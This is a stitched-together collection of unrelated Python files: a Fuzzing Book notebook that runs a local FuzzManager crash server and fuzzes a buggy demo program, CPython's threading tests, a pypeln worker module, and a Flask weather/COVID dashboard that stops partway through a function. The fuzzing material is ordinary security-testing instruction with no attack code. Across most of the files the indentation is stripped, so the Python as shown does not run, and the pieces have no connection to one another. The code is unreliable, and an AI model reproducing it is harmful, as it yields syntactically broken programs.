import shutil
if __name__ == '__main__':
if 'CI' in os.environ:
# Can't run this in our continuous environment,
# since it can't run a headless Web browser
sys.exit(0)
if __name__ == '__main__':
if os.path.exists('FuzzManager'):
shutil.rmtree('FuzzManager')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/MozillaSecurity/FuzzManager')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; git checkout 0.4.1')
if __name__ == '__main__':
import os
os.system(f'pip install -r FuzzManager/server/requirements.txt > /dev/null')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python server/manage.py migrate > /dev/null')
if __name__ == '__main__':
import os
os.system(f'(cd FuzzManager; echo "from django.contrib.auth import get_user_model; User = get_user_model(); User.objects.create_superuser(\'demo\', \'demo@fuzzingbook.org\', \'demo\')" | python server/manage.py shell)')
import subprocess
import sys
if __name__ == '__main__':
os.chdir('FuzzManager')
result = subprocess.run(['python',
'server/manage.py',
'get_auth_token',
'demo'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
os.chdir('..')
err = result.stderr.decode('ascii')
if len(err) > 0:
print(err, file=sys.stderr, end="")
if __name__ == '__main__':
token = result.stdout
token = token.decode('ascii').strip()
token
if __name__ == '__main__':
assert len(token) > 10, "Invalid token " + repr(token)
if __name__ == '__main__':
home = os.path.expanduser("~")
conf = os.path.join(home, ".fuzzmanagerconf")
if __name__ == '__main__':
fuzzmanagerconf = """
[Main]
sigdir = /home/example/fuzzingbook
serverhost = 127.0.0.1
serverport = 8000
serverproto = http
serverauthtoken = %s
tool = fuzzingbook
""" % token
if __name__ == '__main__':
with open(conf, "w") as file:
file.write(fuzzmanagerconf)
from pygments.lexers.configs import IniLexer
from .bookutils import print_file
if __name__ == '__main__':
print_file(conf, lexer=IniLexer())
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: Starting the Server
if __name__ == '__main__':
print('\n### Excursion: Starting the Server')
from multiprocess import Process
import subprocess
def run_fuzzmanager():
def run_fuzzmanager_forever():
os.chdir('FuzzManager')
proc = subprocess.Popen(['python', 'server/manage.py',
'runserver'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True)
while True:
line = proc.stdout.readline()
print(line, end='')
fuzzmanager_process = Process(target=run_fuzzmanager_forever)
fuzzmanager_process.start()
return fuzzmanager_process
if __name__ == '__main__':
fuzzmanager_process = run_fuzzmanager()
import time
if __name__ == '__main__':
time.sleep(2)
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Logging In
if __name__ == '__main__':
print('\n### Logging In')
if __name__ == '__main__':
fuzzmanager_url = "http://127.0.0.1:8000"
if __name__ == '__main__':
from IPython.display import display, Image
from .bookutils import HTML, rich_output
from .GUIFuzzer import start_webdriver # minor dependency
if __name__ == '__main__':
gui_driver = start_webdriver(headless=True, zoom=1.2)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 600)
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
username = gui_driver.find_element_by_name("username")
username.send_keys("demo")
if __name__ == '__main__':
password = gui_driver.find_element_by_name("password")
password.send_keys("demo")
if __name__ == '__main__':
login = gui_driver.find_element_by_tag_name("button")
login.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Collecting Crashes
## ------------------
if __name__ == '__main__':
print('\n## Collecting Crashes')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/choller/simply-buggy')
if __name__ == '__main__':
import os
os.system(f'(cd simply-buggy && make)')
from .bookutils import print_file
if __name__ == '__main__':
print_file("simply-buggy/simple-crash.cpp")
if __name__ == '__main__':
print_file("simply-buggy/simple-crash.fuzzmanagerconf", lexer=IniLexer())
if __name__ == '__main__':
import os
os.system(f'simply-buggy/simple-crash')
import subprocess
if __name__ == '__main__':
cmd = ["simply-buggy/simple-crash"]
if __name__ == '__main__':
result = subprocess.run(cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Yay, we crashed!")
else:
print("Move along, nothing to see...")
### Program Configurations
if __name__ == '__main__':
print('\n### Program Configurations')
if __name__ == '__main__':
sys.path.append('FuzzManager')
if __name__ == '__main__':
from FTB.ProgramConfiguration import ProgramConfiguration
if __name__ == '__main__':
configuration = ProgramConfiguration.fromBinary('simply-buggy/simple-crash')
(configuration.product, configuration.platform)
### Crash Info
if __name__ == '__main__':
print('\n### Crash Info')
if __name__ == '__main__':
from FTB.Signatures.CrashInfo import CrashInfo
if __name__ == '__main__':
cmd = ["simply-buggy/simple-crash"]
result = subprocess.run(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if __name__ == '__main__':
stderr = result.stderr.decode().splitlines()
stderr[0:3]
if __name__ == '__main__':
stdout = result.stdout.decode().splitlines()
stdout
if __name__ == '__main__':
crashInfo = CrashInfo.fromRawCrashData(stdout, stderr, configuration)
print(crashInfo)
### Collector
if __name__ == '__main__':
print('\n### Collector')
if __name__ == '__main__':
from Collector.Collector import Collector
if __name__ == '__main__':
collector = Collector()
if __name__ == '__main__':
collector.submit(crashInfo)
### Inspecting Crashes
if __name__ == '__main__':
print('\n### Inspecting Crashes')
if __name__ == '__main__':
gui_driver.refresh()
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
crash = gui_driver.find_element_by_xpath('//td/a[contains(@href,"/crashmanager/crashes/")]')
crash.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Crash Buckets
## -------------
if __name__ == '__main__':
print('\n## Crash Buckets')
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
create = gui_driver.find_element_by_xpath('//a[contains(@href,"/signatures/new/")]')
create.click()
time.sleep(1)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 1200)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
save = gui_driver.find_element_by_name("submit_save")
save.click()
time.sleep(1)
### Crash Signatures
if __name__ == '__main__':
print('\n### Crash Signatures')
if __name__ == '__main__':
gui_driver.set_window_size(1400, 800)
Image(gui_driver.get_screenshot_as_png())
### Coarse-Grained Signatures
if __name__ == '__main__':
print('\n### Coarse-Grained Signatures')
if __name__ == '__main__':
print_file("simply-buggy/out-of-bounds.cpp")
import os
import random
import subprocess
import tempfile
import sys
#### Excursion: `escapelines()` implementation
if __name__ == '__main__':
    print('\n#### Excursion: `escapelines()` implementation')
def isascii(s):
return all([0 <= ord(c) <= 127 for c in s])
if __name__ == '__main__':
isascii('Hello,')
def escapelines(bytes):
def ascii_chr(byte):
if 0 <= byte <= 127:
return chr(byte)
return r"\x%02x" % byte
def unicode_escape(line):
ret = "".join(map(ascii_chr, line))
assert isascii(ret)
return ret
return [unicode_escape(line) for line in bytes.splitlines()]
if __name__ == '__main__':
escapelines(b"Hello,\nworld!")
if __name__ == '__main__':
escapelines(b"abc\xffABC")
#### End of Excursion
if __name__ == '__main__':
print('\n#### End of Excursion')
if __name__ == '__main__':
cmd = ["simply-buggy/out-of-bounds"]
# Connect to crash server
collector = Collector()
random.seed(2048)
crash_count = 0
TRIALS = 20
for itnum in range(0, TRIALS):
rand_len = random.randint(1, 1024)
rand_data = bytes([random.randrange(0, 256) for i in range(rand_len)])
(fd, current_file) = tempfile.mkstemp(prefix="fuzztest", text=True)
os.write(fd, rand_data)
os.close(fd)
current_cmd = []
current_cmd.extend(cmd)
current_cmd.append(current_file)
result = subprocess.run(current_cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout = [] # escapelines(result.stdout)
stderr = escapelines(result.stderr)
crashed = False
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
print(itnum, end=" ")
if crashed:
sys.stdout.write("(Crash) ")
# This reads the simple-crash.fuzzmanagerconf file
configuration = ProgramConfiguration.fromBinary(cmd[0])
# This reads and parses our ASan trace into a more generic format,
# returning us a generic "CrashInfo" object that we can inspect
# and/or submit to the server.
crashInfo = CrashInfo.fromRawCrashData(stdout, stderr, configuration)
# Submit the crash
collector.submit(crashInfo, testCase = current_file)
crash_count += 1
os.remove(current_file)
print("")
print("Done, submitted %d crashes after %d runs." % (crash_count, TRIALS))
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url + "/crashmanager/crashes")
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Collecting Code Coverage
## ------------------------
if __name__ == '__main__':
print('\n## Collecting Code Coverage')
if __name__ == '__main__':
print_file("simply-buggy/maze.cpp")
if __name__ == '__main__':
import os
os.system(f'(cd simply-buggy && make clean && make coverage)')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/choller/simply-buggy $HOME/simply-buggy-server ')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python3 server/manage.py setup_repository simply-buggy GITSourceCodeProvider $HOME/simply-buggy-server')
import random
import subprocess
if __name__ == '__main__':
random.seed(0)
cmd = ["simply-buggy/maze"]
constants = [3735928559, 1111638594]
TRIALS = 1000
for itnum in range(0, TRIALS):
current_cmd = []
current_cmd.extend(cmd)
for _ in range(0, 4):
if random.randint(0, 9) < 3:
current_cmd.append(str(constants[
random.randint(0, len(constants) - 1)]))
else:
current_cmd.append(str(random.randint(-2147483647, 2147483647)))
result = subprocess.run(current_cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
if stderr and "secret" in stderr[0]:
print(stderr[0])
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Found the bug!")
break
print("Done!")
if __name__ == '__main__':
import os
os.system(f'export PATH=$HOME/.cargo/bin:$PATH; grcov simply-buggy/ -t coveralls+ --commit-sha $(cd simply-buggy && git rev-parse HEAD) --token NONE -p `pwd`/simply-buggy/ > coverage.json')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python3 -mCovReporter --repository simply-buggy --description "Test1" --submit ../coverage.json')
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url + "/covmanager")
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
first_id = gui_driver.find_element_by_xpath('//td/a[contains(@href,"/browse")]')
first_id.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
maze_cpp = gui_driver.find_element_by_xpath("//*[contains(text(), 'maze.cpp')]")
maze_cpp.click()
time.sleep(1)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 1400)
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
random.seed(0)
cmd = ["simply-buggy/maze"]
# Added the missing constant here
constants = [3735928559, 1111638594, 3405695742]
for itnum in range(0,1000):
current_cmd = []
current_cmd.extend(cmd)
for _ in range(0,4):
if random.randint(0, 9) < 3:
current_cmd.append(str(
constants[random.randint(0, len(constants) - 1)]))
else:
current_cmd.append(str(random.randint(-2147483647, 2147483647)))
result = subprocess.run(current_cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
if stderr:
print(stderr[0])
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Found the bug!")
break
print("Done!")
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Lessons Learned
## ---------------
if __name__ == '__main__':
print('\n## Lessons Learned')
if __name__ == '__main__':
fuzzmanager_process.terminate()
if __name__ == '__main__':
gui_driver.quit()
import shutil
if __name__ == '__main__':
for temp_file in ['coverage.json', 'geckodriver.log', 'ghostdriver.log']:
if os.path.exists(temp_file):
os.remove(temp_file)
if __name__ == '__main__':
home = os.path.expanduser("~")
for temp_dir in ['coverage', 'simply-buggy', 'simply-buggy-server',
os.path.join(home, 'simply-buggy-server'),
'FuzzManager']:
if os.path.exists(temp_dir):
shutil.rmtree(temp_dir)
## Next Steps
## ----------
if __name__ == '__main__':
print('\n## Next Steps')
## Background
## ----------
if __name__ == '__main__':
print('\n## Background')
## Exercises
## ---------
if __name__ == '__main__':
print('\n## Exercises')
### Exercise 1: Automatic Crash Reporting
if __name__ == '__main__':
print('\n### Exercise 1: Automatic Crash Reporting')
|
test_threading.py
|
# Very rudimentary test of threading module
import test.support
from test.support import verbose
import random
import re
import sys
import threading
import _thread
import time
import unittest
import weakref
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assert_(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.failUnlessEqual(t.ident, None)
self.assert_(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.is_alive())
self.failIfEqual(t.ident, 0)
self.assert_(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256kB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
if verbose:
print('platform does not support changing thread stack size')
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1MB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
if verbose:
print('platform does not support changing thread stack size')
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Acquiring an RLock forces an entry for the foreign
# thread to get made in the threading._active map.
r = threading.RLock()
r.acquire()
r.release()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print("test_PyThreadState_SetAsyncExc can't import ctypes")
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = _thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
worker_started.wait()
if verbose:
print(" verifying worker hasn't exited")
self.assert_(not t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""])
        self.failIf(rc == 2, "interpreter was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in range(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEquals(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEquals(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
class ThreadJoinOnShutdown(unittest.TestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
self.failIf(rc == 2, "interpreter was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'os2emx'):
            print('Skipping test_3_join_in_forked_from_thread'
                  ' due to known OS bugs on', sys.platform, file=sys.stderr)
return
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
class ThreadingExceptionTests(unittest.TestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_releasing_unacquired_rlock(self):
rlock = threading.RLock()
self.assertRaises(RuntimeError, rlock.release)
def test_waiting_on_unacquired_condition(self):
cond = threading.Condition()
self.assertRaises(RuntimeError, cond.wait)
def test_notify_on_unacquired_condition(self):
cond = threading.Condition()
self.assertRaises(RuntimeError, cond.notify)
def test_semaphore_with_negative_value(self):
self.assertRaises(ValueError, threading.Semaphore, value = -1)
self.assertRaises(ValueError, threading.Semaphore, value = -sys.maxsize)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
def test_main():
test.support.run_unittest(ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
worker.py
|
import abc
from copy import copy
from dataclasses import dataclass, field
import functools
import multiprocessing
from multiprocessing import synchronize
import threading
import time
import typing as tp
import stopit
from pypeln import utils as pypeln_utils
from . import utils
from .queue import IterableQueue, OutputQueues
WorkerConstructor = tp.Callable[[int, "StageParams", IterableQueue], "Worker"]
Kwargs = tp.Dict[str, tp.Any]
T = tp.TypeVar("T")
class ProcessFn(pypeln_utils.Protocol):
def __call__(self, worker: "Worker", **kwargs):
...
class StageParams(tp.NamedTuple):
input_queue: IterableQueue
output_queues: OutputQueues
namespace: utils.Namespace
@classmethod
def create(
cls, input_queue: IterableQueue, output_queues: OutputQueues, total_workers: int
) -> "StageParams":
return cls(
namespace=utils.Namespace(active_workers=total_workers),
input_queue=input_queue,
output_queues=output_queues,
)
def worker_done(self):
with self.namespace:
self.namespace.active_workers -= 1
class WorkerInfo(tp.NamedTuple):
index: int
@dataclass
class Worker(tp.Generic[T]):
process_fn: ProcessFn
index: int
timeout: float
stage_params: StageParams
main_queue: IterableQueue
on_start: tp.Optional[tp.Callable[..., Kwargs]]
on_done: tp.Optional[tp.Callable[..., Kwargs]]
use_threads: bool
f_args: tp.List[str]
namespace: utils.Namespace = field(
default_factory=lambda: utils.Namespace(done=False, task_start_time=None)
)
process: tp.Optional[tp.Union[multiprocessing.Process, threading.Thread]] = None
def __call__(self):
worker_info = WorkerInfo(index=self.index)
on_start_args: tp.List[str] = (
pypeln_utils.function_args(self.on_start) if self.on_start else []
)
on_done_args: tp.List[str] = (
pypeln_utils.function_args(self.on_done) if self.on_done else []
)
try:
if self.on_start is not None:
on_start_kwargs = dict(worker_info=worker_info)
kwargs = self.on_start(
**{
key: value
for key, value in on_start_kwargs.items()
if key in on_start_args
}
)
else:
kwargs = {}
if kwargs is None:
kwargs = {}
kwargs.setdefault("worker_info", worker_info)
self.process_fn(
self,
**{key: value for key, value in kwargs.items() if key in self.f_args},
)
self.stage_params.worker_done()
if self.on_done is not None:
kwargs.setdefault(
"stage_status",
StageStatus(
namespace=self.stage_params.namespace,
),
)
self.on_done(
**{
key: value
for key, value in kwargs.items()
if key in on_done_args
}
)
self.stage_params.output_queues.worker_done()
except pypeln_utils.StopThreadException:
pass
except BaseException as e:
self.main_queue.raise_exception(e)
time.sleep(0.01)
finally:
self.done()
def start(self):
[self.process] = start_workers(self, use_threads=self.use_threads)
def stop(self):
if self.process is None:
return
if not self.process.is_alive():
return
if isinstance(self.process, multiprocessing.Process):
self.process.terminate()
else:
stopit.async_raise(
self.process.ident,
pypeln_utils.StopThreadException,
)
self.namespace.task_start_time = None
def done(self):
self.namespace.done = True
def did_timeout(self):
task_start_time = self.namespace.task_start_time
done = self.namespace.done
return (
self.timeout
and not done
and task_start_time is not None
and (time.time() - task_start_time > self.timeout)
)
@dataclass
class MeasureTaskTime:
worker: "Worker"
def __enter__(self):
self.worker.namespace.task_start_time = time.time()
def __exit__(self, *args):
self.worker.namespace.task_start_time = None
def measure_task_time(self):
return self.MeasureTaskTime(self)
class Applicable(pypeln_utils.Protocol):
def apply(self, worker: "Worker", elem: tp.Any, **kwargs):
...
class ApplyProcess(ProcessFn, Applicable):
def __call__(self, worker: Worker, **kwargs):
for elem in worker.stage_params.input_queue:
with worker.measure_task_time():
self.apply(worker, elem, **kwargs)
class StageStatus:
"""
    Object passed to various `on_done` callbacks. It contains information about the stage in case bookkeeping is needed.
"""
def __init__(self, namespace):
self._namespace = namespace
@property
def done(self) -> bool:
"""
`bool` : `True` if all workers finished.
"""
return self._namespace.active_workers == 0
@property
def active_workers(self):
"""
`int` : Number of active workers.
"""
return self._namespace.active_workers
def __str__(self):
return (
f"StageStatus(done = {self.done}, active_workers = {self.active_workers})"
)
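# Illustrative example (added; not part of the original module): an `on_done`
# callback can receive the StageStatus above by declaring a `stage_status`
# parameter, which Worker.__call__ fills in before invoking it:
#
#     def on_done(stage_status):
#         print(stage_status)  # e.g. StageStatus(done = True, active_workers = 0)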
# ----------------------------------------------------------------
# create_daemon_workers
# ----------------------------------------------------------------
def start_workers(
target: tp.Callable,
n_workers: int = 1,
args: tp.Tuple[tp.Any, ...] = tuple(),
kwargs: tp.Optional[tp.Dict[tp.Any, tp.Any]] = None,
use_threads: bool = False,
) -> tp.Union[tp.List[multiprocessing.Process], tp.List[threading.Thread]]:
if kwargs is None:
kwargs = {}
workers = []
for _ in range(n_workers):
if use_threads:
t = threading.Thread(target=target, args=args, kwargs=kwargs)
else:
t = multiprocessing.Process(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
workers.append(t)
return workers
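# Minimal usage sketch for start_workers() (added for illustration; the demo
# target, its argument and the join timeout are assumptions, not part of the
# original module):
if __name__ == "__main__":
    def _demo_target(name: str):
        # runs once in each worker thread started below
        print(f"worker thread received argument: {name!r}")

    _demo_workers = start_workers(
        _demo_target, n_workers=2, args=("demo",), use_threads=True
    )
    for _worker in _demo_workers:
        _worker.join(timeout=1.0)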
|
main.py
|
from flask import render_template
from flask import Flask
from flask import request
from pyowm.owm import OWM
import requests
import time
import sched
import datetime
from uk_covid19 import Cov19API
import threading
import pyttsx3
import json
import os
app= Flask(__name__,template_folder='template')
@app.route('/index')
def index():
"""Inside this function are functions called that are needed in the app route,
this function returns the render template"""
close_notif()
get_time()
update_label()
return render_template("index.html",title="Daily Update",notifications=listfornotification,alarms=listforalarm,image="alarm.png" )
listfornotification=[{'title':'','content':''}]
listforalarm=[{'title':'','content':''}]
"""So the Alarm and Notification list don't return and empty element in the list """
listfornotification=[]
listforalarm=[]
"""To find the number of elements in the Alarm and Notification list for deletion"""
a=len(listforalarm)
n=len(listfornotification)
def weather():
"""Opens Config file to get information useful to this function"""
script_dir=os.path.dirname(__file__)
relative='/config.json'
combined_file_path=script_dir+relative
with open(combined_file_path,'r') as config:
data=json.load(config)
"""Returns Notification list with contents of The Weather Update"""
owm = OWM(data['APIWEATHERNEWS'])
mgr = owm.weather_manager()
location=data['WEATHERLOCATION'] #location is here
observation = mgr.weather_at_place(location) #observation object is a box containing a weather object
weather = observation.weather
status=weather.detailed_status #detailed status
temperature = weather.temperature('celsius')#temperature in Celsius
finaltemp=(str(int(temperature['temp'])))#gets temp alone from the list and converts it to a string
final='The temperature today in '+location+' is ' + finaltemp+'°C' ' and today will have ' + status#cleans up the final output
return listfornotification.append({'title':"Weather Update",'content':final})
def tts_request(announcement):
engine = pyttsx3.init()
engine.say(announcement)
engine.runAndWait()
return "Hello text-to-speech example"
def close_notif():
close_notifs=request.args.get('notif')
if close_notifs:
del listfornotification[n]
def covid_update():
script_dir=os.path.dirname(__file__)
relative='/config.json'
combined_file_path=script_dir+relative
with open(combined_file_path,'r') as config:
data=json.load(config)
Area=[
'areaName=Exeter'
]
cases_and_deaths = {
"date": "date",
"areaName": "areaName",
"areaCode": "areaCode",
"newCasesByPublishDate": "newCasesByPublishDate",
"cumCasesByPublishDate": "cumCasesByPublishDate",
"newDeathsByDeathDate": "newDeathsByDeathDate",
"cumDeathsByDeathDate": "cumDeathsByDeathDate"
}
